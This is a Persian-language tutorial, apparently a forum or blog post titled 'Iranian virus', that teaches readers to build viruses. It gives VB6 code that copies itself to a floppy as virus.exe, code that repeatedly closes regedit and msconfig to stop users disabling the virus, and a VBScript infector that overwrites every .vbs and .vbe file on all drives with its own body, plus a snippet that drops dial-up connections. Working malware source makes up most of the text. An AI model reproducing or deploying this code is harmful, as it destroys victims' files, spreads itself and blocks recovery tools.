ویروس ایرانی

On Error GoTo h

Set fso = CreateObject("Scripting.FileSystemObject")

mf = App.Path & "\" & App.EXEName & ".exe"

If Dir("A:\" & "virus.exe") = "" Then

FileCopy mf, "A:\" & "virus.exe"

End If

h:

توضیح کدها:در خط اول می گوید که اگر برنامه error پیدا کرد،آن را به خط آخر منتقل کند.خط دوم هم که می دانید.در خط سوم،ویروس مسیر فایل خودش را می گیرد که برای کپی کردن خودش درون فلاپی نیاز است.در خط چهارم می گوید که اگر در فلاپی فایلی به نام virus.exe وجود ندارد،خودش را با نام virus.exe در فلاپی کپی کند.

یکی از راه های غیر فعال کردن ویروس ها،regedit و msconfig می باشد.با این دو برنامه ای که در ویندوز وجود دارد،می توان کاری کرد که ویروس،در هر بار اجرای ویندوز،اجرا نشود.در run 

عبارت regedit یا msconfig را تایپ کنید تا این برنامه اجرا شوند.

برای غیرفعال کردن این دو برنامه کارهای زیر را انجام دهید:

ابتدا کدهای زیر را در قسمت general کپی کنید:

Private Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

حالا این کدها را در یک timer کپی کنید:

Dim reghwnd As Long

Dim syshwnd As Long

 Const WM_CLOSE = &H10

syshwnd = FindWindow(vbNullString, "System Configuration Utility")

reghwnd = FindWindow("RegEdit_RegEdit", vbNullString)

If syshwnd <> 0 Then SendMessage syshwnd, WM_CLOSE, 0&, 0&

If reghwnd <> 0 Then SendMessage reghwnd, WM_CLOSE, 0&, 0&

ساخت ويروس:

براي ساخت ويروس کدهاي زير را در notepad ويندوز کپي کنيد.سپس از منوي فايل گزينه ي save as را انتخاب کنيد و در کادر filename نام دلخواهتان را وارد کنيد ولي بعد از نام حتما"  بنويسيد:        

.vbs  يا    .vbe

مثلا" اگر مي خواهيد نام آن را Biosan بگذاريد،در کادر بنويسيد:              

   Biosan.vbs يا     Biosan.vbe

On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.is ready Then
folderlist(d.path&"\")
end if
Next
end sub
sub infectfiles(folderspec)
On Error Resume Next
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
if (ext="vbs") or (ext="vbe") then
set ap=fso.Opentextfile(f1.path,2,true)
ap.write vbscopy
ap.close
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub

ويروس آمادس.توضيح کدها در پست بعد.

Private Declare Function GetTickCount& Lib "kernel32" ()
Private Declare Function Beep Lib "kernel32" (ByVal dwFreq As Long, ByVal dwDuration As Long) As Long

يک تايمر درست کنيد و اين کد ها را درونش بنويسيد.

t = GetTickCount& \ 60000
If t >= 10 Then
Beep 135, 3304

Call Shell("rundll32 iedkcs32.dll,CloseRASConnections")